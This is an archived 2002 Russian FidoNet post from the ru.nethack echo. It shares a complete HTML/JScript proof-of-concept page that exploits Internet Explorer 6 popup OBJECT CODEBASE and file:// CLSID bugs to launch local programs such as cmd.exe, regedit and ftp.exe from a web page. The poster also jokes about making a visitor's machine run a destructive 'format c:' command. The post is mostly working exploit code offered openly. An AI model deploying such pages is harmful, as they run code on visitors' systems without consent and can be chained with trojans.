|
ru.nethack
- RU.NETHACK -------------------------------------------------------------------
From : Drone 2:5020/1990.111 22 Feb 2002 16:02:00
To : All
Subject : Задолбали баги в IE6.0.
--------------------------------------------------------------------------------
Сабж... Вот еще один... Позволяет запускать любые файлы на компьютере юзера.
У меня на WinXP + IE6.0 работает :(
Как насчет такого: заходишь на страничку, а тут тебе format c: /q /u /autotest
выполняют :)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Extensibility Page</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1251">
<SCRIPT language=JScript>
//BELOW POPUP CODE
var oPopup = window.createPopup();
function openPopupCMD()
{
var oPopBody = oPopup.document.body;
oPopBody.innerHTML = '<OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/cmd.exe"></OBJECT><OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/winnt/system32/cmd.exe"></OBJECT><OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/windows/explorer.exe"></OBJECT>';
oPopup.show(290, 190, 200, 200, document.body);
}
function openRegedit()
{
var oPopBody = oPopup.document.body;
oPopBody.innerHTML = '<OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/windows/Regedit.exe"></OBJECT><OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/winnt/regedit.exe"></OBJECT>';
oPopup.show(290, 190, 200, 200, document.body);
}
function openCalc()
{
var oPopBody = oPopup.document.body;
oPopBody.innerHTML = '<OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/windows/calc.exe"></OBJECT><OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/winnt/system32/calc.exe"></OBJECT>';
oPopup.show(290, 190, 200, 200, document.body);
}
function openFTP()
{
var oPopBody = oPopup.document.body;
oPopBody.innerHTML = '<OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/windows/FTP.exe"></OBJECT><OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/winnt/system32/FTP.exe"></OBJECT>';
oPopup.show(290, 190, 200, 200, document.body);
}
function openPopupCleanMGR()
{
var oPopBody = oPopup.document.body;
oPopBody.innerHTML = '<OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/windows/cleanmgr.exe"></OBJECT><OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/winnt/system32/cleanmgr.exe"></OBJECT>';
oPopup.show(290, 190, 200, 200, document.body);
}
function openGames()
{
var oPopBody = oPopup.document.body;
oPopBody.innerHTML = '<OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/Program
Files/Plus!/PINBALL.exe"></OBJECT><OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="C:/Program
Files/Windows NT/Pinball/Pinball.exe"></OBJECT><OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/windows/MSHEARTS.EXE"></OBJECT><OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="C:/winnt/system32/winmine.exe"></OBJECT>';
oPopup.show(290, 190, 200, 200, document.body);
}
function openPaint()
{
var oPopBody = oPopup.document.body;
oPopBody.innerHTML = '<OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="c:/Program
Files/Accessories/mspaint.exe"></OBJECT><OBJECT NAME="X"
CLASSID="CLSID:11111111-1111-1111-1111-111111111111"
CODEBASE="c:/winnt/system32/mspaint.exe"></OBJECT>';
oPopup.show(290, 190, 200, 200, document.body);
}
</SCRIPT>
<SCRIPT language=JScript>
//BELOW file://::{CLSID} code
function openControlPanel()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA-
1069-A2DD-08002B30309D}");
}
function openFonts()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA-
1069-A2DD-08002B30309D}/::{D20EA4E1-3957-11d2-A40B-0C5020524152}");
}
function openAdminTools()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{21EC2020-3AEA-
1069-A2DD-08002B30309D}/::{D20EA4E1-3957-11d2-A40B-0C5020524153}");
}
function openDialUpNetworking()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{992CFFA0-F557-
101A-88EC-00DD010CCC48}");
}
function openNetworkNeighborhood()
{
window.open("file:///::{208D2C60-3AEA-1069-A2D7-08002B30309D}");
}
function openTasks()
{
window.open("file:///::{20D04FE0-3AEA-1069-A2D8-08002B30309D}/::{D6277990-4C6A-
11CF-8D87-00AA0060F5BF}");
}
function openRecycleBin()
{
window.open("file:///::{645FF040-5081-101B-9F08-00AA002F954E}");
}
function openMyDocuments()
{
window.open("file:///::{450D8FBA-AD25-11D0-98A8-0800361B1103}/");
}
</SCRIPT>
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY>
<H1>Internet Explorer Fun Run Page</H1>
<P>[For Internet Explorer 6 with updates q312361,q240308, and q313675, possibly
earlier versions.]</P>
<P>Click your mouse over the words below and have some fun seeing what remote
website authors can run on your system at their convenience. While this is
amusing and startling, with a few loops it could cause a bit of a catastrophe on
your system. Combined with other exploits: force fed trojans could be run;
possibly command parameters run; or directory traversal (client side) exploits.
I have included demonstrations here of the PopUp OBJECT tag bug as well as the
"directoryInfo" bug because they have similiar results and combine to paint an
interesting picture. <BR>Be sure and clean out your "Downloaded Program Files"
directory when done. <BR>Note: File paths made for Windows 2000 and Windows ME.
</P><BR><BR>Pop-Up Exploit Stuff - Click on the Words
Below<BR>_________________________________________
<P onclick=openPopupCMD();><U><FONT color=#3333ff>Command</FONT></U></P>
<P onclick=openRegedit()><U><FONT color=#3333ff>Regedit</FONT></U></P>
<P onclick=openCalc()><U><FONT color=#3333ff>Calculator</FONT></U></P>
<P onclick=openFTP()><U><FONT color=#3333ff>FTP</FONT></U></P>
<P onclick=openPopupCleanMGR()><U><FONT
color=#3333ff>CleanManager</FONT></U></P>
<P onclick=openGames()><U><FONT color=#3333ff>Games</FONT></U></P>
<P onclick=openPaint()><U><FONT color=#3333ff>Paint</FONT></U></P>File:{CLSID}
Stuff - Click on the Words Below<BR>_________________________________________
<P onclick=openControlPanel()><U><FONT color=#3333ff>Control
Panel</FONT></U></P>
<P onclick=openFonts()><U><FONT color=#3333ff>Fonts</FONT></U></P>
<P onclick=openAdminTools()><U><FONT color=#3333ff>Admin Tools</FONT></U></P>
<P onclick=openDialUpNetworking()><U><FONT color=#3333ff>Dial Up
Networking</FONT></U></P>
<P onclick=openNetworkNeighborhood()><U><FONT color=#3333ff>Network
Neighborhood</FONT></U></P>
<P onclick=openTasks()><U><FONT color=#3333ff>Tasks</FONT></U></P>
<P onclick=openRecycleBin()><U><FONT color=#3333ff>Recycle Bin</FONT></U></P>
<P onclick=openMyDocuments()><U><FONT color=#3333ff>My
Documents</FONT></U></P><BR><BR><BR></BODY></HTML>
°±ІЫ С уважением, Андрей Ковалев ЫІ±°
Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет...
--- [Mo.Nashe.Radio] [Mo.Mesi] [http://drone.nm.ru] [http://www.funmp3.tk]
* Origin: E-mail: drone[at]igromania.ru ICQ:117846611 (2:5020/1990.111)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
|
